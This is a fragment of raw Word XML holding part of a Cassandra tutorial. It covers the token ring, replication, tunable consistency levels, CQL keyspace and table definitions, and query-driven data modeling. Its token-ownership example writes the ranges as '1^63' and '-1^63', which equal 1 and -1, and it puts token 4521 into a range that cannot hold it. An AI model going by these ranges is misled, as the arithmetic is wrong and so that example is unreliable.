    <w:p w14:paraId="1087B1EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C1063F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   │                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819671E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   │    ┌────────────┐    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195C7A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   │    │   Node E   │    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18749C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   └────│Token: 0^63 │────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E4795" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        └────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D00D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425E630" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Every node is EQUAL (no master, no leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC8E1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Each node owns a range of the token ring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE4BDBC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Data is placed on nodes based on hash(partition_key) → token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654FAEE9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key architectural properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF603C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1580"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No single point of failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Every node is identical. Any node can serve any request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FBA8AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1580"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gossip protocol:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Nodes discover each other and share cluster state via gossip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05830EAE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1580"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Partition keys are hashed to determine placement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD6D92B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1580"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual nodes (vnodes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Each physical node owns 256 token ranges (not just 1) for better distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405603B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Data Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED85233" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD65183" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partition key: user_id = "alice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801C00B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hash: Murmur3("alice") = token 4521</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36313B57" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Replication factor: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE4E2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="34C9D875" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Token ownership:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E81DE9D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Node A: tokens [-2^63, -1^63)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17460C46" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Node B: tokens [-1^63, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755187BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Node C: tokens [0, 1^63)        ← token 4521 lands here (primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D11AE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Node D: tokens [1^63, 2^63)     ← first replica (clockwise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800ECA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Node E: (wraps)                  ← second replica (clockwise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76837E02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2D860D89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Data for "alice" stored on: Node C, Node D, Node E (3 copies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC20F86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Tunable Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DA377C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F658A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write consistency levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073742A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ANY:    Write succeeds if ANY node (even a hint) acknowledges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E044971" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ONE:    At least 1 replica acknowledges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35827946" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  QUORUM: Majority (</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌊</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t>RF/2</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌋</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> + 1) of replicas acknowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69734AC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ALL:    ALL replicas acknowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07084754" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  LOCAL_QUORUM: Majority in the LOCAL datacenter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A51A3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4FEC5CE4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Read consistency levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B482A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ONE:    Read from 1 replica (fastest, may be stale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0502C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  QUORUM: Read from majority, return most recent (consistent if W+R &gt; RF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244787E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ALL:    Read from all replicas (slowest, guaranteed fresh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735379A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  LOCAL_QUORUM: Majority in local DC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA2FFDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2B3E90DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Strong consistency: W + R &gt; RF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A481E2B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Example: RF=3, W=QUORUM(2), R=QUORUM(2) → 2+2=4 &gt; 3 → guaranteed to read latest write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA0DB8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0BAD2B3B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Eventual consistency: W + R ≤ RF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6032AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Example: RF=3, W=ONE(1), R=ONE(1) → 1+1=2 ≤ 3 → may read stale data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84F230" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Cassandra Data Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BDF07" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Keyspace, Table, Partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7BCE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>cql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5B318" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Keyspace (like a database/namespace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4471C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE KEYSPACE ecommerce WITH replication = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD4212" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  'class': 'NetworkTopologyStrategy',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C8C86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  'us-east': 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6657BE4E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  'eu-west': 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C9711" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC541E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7A240725" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53330735" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE ecommerce.orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A86454" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  customer_id UUID,          -- PARTITION KEY (determines which node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421DCFD2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  order_date TIMESTAMP,      -- CLUSTERING KEY (determines sort within partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA74F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  order_id UUID,             -- CLUSTERING KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68253098" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  total DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C61866" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  status TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2F172" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  items LIST&lt;FROZEN&lt;item_type&gt;&gt;,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45158DF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  PRIMARY KEY ((customer_id), order_date, order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2FCC3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>) WITH CLUSTERING ORDER BY (order_date DESC, order_id ASC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7B71C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PRIMARY KEY anatomy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789860B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C371DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>PRIMARY KEY ((partition_key), clustering_key1, clustering_key2, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF3672D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="30C9FEEB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(customer_id)      → PARTITION KEY: determines which node stores the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045417B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>order_date, order_id → CLUSTERING KEYS: determine sort order WITHIN the partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEDE9CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="412EEFFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>All rows with same partition key = one "partition" = stored together on same node(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B944DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Within a partition: rows sorted by clustering key(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9342C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Query-Driven Data Modeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12758F22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cassandra rule: Design tables for your queries, NOT for your entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300BFBA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC81B24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ANTI-PATTERN (relational thinking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5DC04" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  One table for users, one for orders, JOIN them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96582D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Cassandra has NO JOINs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C17E35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5E137225" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CASSANDRA PATTERN (query-driven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0EECCE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query 1: "Get all orders for customer X, sorted by date"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F5BDF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Table: orders_by_customer (partition: customer_id, cluster: order_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A946D53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B32F7FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query 2: "Get all orders with status 'pending'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5FD7BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Table: orders_by_status (partition: status, cluster: order_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E41DB1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → (Different table with same data, different partition key!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A53D355" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
